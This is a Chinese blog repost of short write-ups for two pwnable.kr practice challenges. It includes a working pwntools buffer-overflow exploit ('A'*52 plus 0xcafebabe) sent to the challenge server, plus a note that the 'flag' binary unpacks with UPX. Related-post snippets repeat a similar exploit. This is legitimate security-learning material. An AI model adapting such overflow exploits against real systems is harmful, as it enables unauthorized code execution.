pwnable.kr第二天

最新推荐文章于 2023-02-08 15:28:31 发布

weixin_30367945

最新推荐文章于 2023-02-08 15:28:31 发布

阅读量78

点赞数

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/liyuechan/p/10902825.html

博客介绍两道题的解题情况。一题是简单的数组越界覆盖，用gdb调试出偏移即可；另一题是upx加壳题，发现upx字样后用upx.exe操作得到flag。

3、bof

这题就是简单的数组越界覆盖，直接用gdb

调试出偏移就ok

from pwn import *
context.log_level='debug'
payload='A'*52+p32(0xcafebabe)
print payload
turn=True
if turn:
    p=remote('pwnable.kr',9000)
else:
    p=process('./bof')
p.sendline(payload)
p.interactive()

4、flag

这道题。。。严重坑，没想到是upx 加壳。。。呜呜·····

最后还是无意中看到了 upx这个字样。。。然后果断 upx.exe ..然后flag就出来了。

转载于:https://www.cnblogs.com/liyuechan/p/10902825.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30367945

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

pwn学习：pwnable.kr bof

Richard_pl的博客

03-12

563

Day 3： Study pwn via pwnable.kr——bof 写在前面：记录自己的学习过程，从零开始。。。第三天！！！首先下载文件打开.c文件查看源码可以看出本次的最终目标就是覆盖key值。漏洞可能在gets函数上。使用gdb打开二进制文件也可以通过IDA进行分析打开文件，查看文件开启的保护措施并设置若干断点。通过汇编程序查找到相关变量的地址我们的最终目的...

pwn学习：pwnable.kr flag

Richard_pl的博客

03-16

594

Day 4： Study pwn via pwnable.kr——collision 写在前面：记录自己的学习过程，从零开始。。。第 100b 天！！！首先分析文件在这里呢我们发现文件是ELF格式的，依次可以判断文件是被压缩的了。这里使用upx -d指定对文件进行解压，之后进行调试。使用gdb调试程序这里我们可以看出在main + 13的这条指令使用了一个puts命令，我们...

参与评论您还未登录，请先登录后发表或查看评论

pwntools学习记录（一）

Yannie's Blog

12-12

1263

参考文章：https://bbs.pediy.com/thread-247217.htm 我们先来就着上次写的bof的exp来讲解一下 from pwn import * c = remote("pwnable.kr",9000) c.sendline("AAAA"*13+p32(0xcafebabe)) c.interactive() remote("一个域名或者ip地址", 端口)会连接到我...

pwnable.kr blackjack

r250414958的博客

08-11

270

看一下题目题目给出了一个连接，我们去看看 https://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html 代码太长就不贴出来了，复制到vs编译玩一下玩了一下发现和21点游戏规则是一样的，blackjack翻译过来也就是21点每次，让游戏中下注，然后和电脑比赛，下注的金额不能超过所持有...

通过pwnable.kr从零学pwn

热门推荐

giantbranch的专栏

07-31

1万+

本文链接：http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的挑战地址：http://pwnable.kr/play.php fd 首先不用说给了就直接连上去看一下代码重要函数：read ssize_t read(int fd,void *

[pwnable.kr]uaf

iekuil的博客

10-08

531

先贴上uaf.cpp的源码又是学新东西的一天这道题主要会用到的知识点：1.c++多态性中，通过虚函数表实现的动态多态（或者叫运行时多态）2.uaf（use after free）漏洞的基本原理3.c++对象在内存中的布局（不多，这题只需要知道vptr在起始处）

pwnable.kr之blackjack

river

05-17

2288

blackjack 这几天好忙，有点烦躁，这几天可能都没有什么时间刷题了。。。加油！代码：http://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html 拿到代码后，读代码….看题。在代码中发现了这样一个函数，就是用户输入bet后，要判断一下，是不是大于500，如果大于500，就

pwn学习：pwnable.kr collision

Richard_pl的博客

03-16

442

Day 2： Study pwn via pwnable.kr——collision 写在前面：记录自己的学习过程，从零开始。。。第二天！！！连接并检查相关文件查看C源码这里其实我们可以看出该代码的意思就是输入一个20字节的字符串，然后程序将这20字节字符串转化成5个4字节的int型数字，将四个数字的和作为最终输入与hashcode对比。可以看出hashcode为一个全局变量定义...

pwnable.tw---start

杀生丸？不，其实我要的是桔梗

04-30

1664

Pwnable.tw—start 最近比赛玩了好几天的pwn，发现老是差点火候，开始正式刷刷Pwnable.tw看看。题目分析： checksec : 第一次遇到什么防护都不开的程序，兴奋。 IDA: 题目只有start和exit。检测栈有点问题，不能够F5,强行看汇编。。。 .text:08048060 public _start ....

pwnable.kr第七八题 input leg

weixin_42877778的博客

02-08

464

pwnable.kr 第七题input 第八题leg

从pwnable.kr 入门pwn系列教程(1)

NoOneGroup

07-24

3386

博客已经转移 https://noone-hub.github.io/ 前言：前段时间学了一段时间pwn，因为某些事断了下来，现在开始重新学习，现在立志要真正入门pwn，会编写漏洞利用(利用pwntools),会基本linux命令，因为pwn题目很多都是在linux下的，比较少在windows下。正文：今天通过pwnable.kr的第一道题目fd来学习pwn 题目就是这样，题目最...

pwnable.kr-fix

r00tnb的博客

02-28

933

前言看似简单的改代码题，但是还是需要强大的汇编知识。花了很长时间，主要是自己对指令不是很熟悉。另外pwnable.kr的练习我会在另一个博客http://www.ktstartblog.top持续更新欢迎大家来踩。分析先分析源码fix.c #include &lt;stdio.h&gt; // 23byte shellcode from http://shell-storm...

PWN flag [pwnable.kr]CTF writeup题解系列4

重新启程

01-01

1040

直接看题目这是一道逆向题目，直接下载下来看看 root@mypwn:/ctf/work/pwnable.kr# wget http://pwnable.kr/bin/flag --2020-01-01 09:37:31-- http://pwnable.kr/bin/flag Resolving pwnable.kr (pwnable.kr)... 128.61.240.205 ...

网络安全监控数据大屏案例.zip

09-08

网络安全监控数据大屏案例.zip

xapp794-1080p60-camera_中英文对照版_2025年.pdf

09-08

xapp794-1080p60-camera_中英文对照版_2025年

xapp1220-ultrascale-bpi-config-prog-nor-flash_中英文对照版_2025年.pdf

09-08

xapp1220-ultrascale-bpi-config-prog-nor-flash_中英文对照版_2025年

wendong18_525_34256_1757323956580.zip

09-08

wendong18_525_34256_1757323956580.zip

MVIMG_20250908_231048.jpg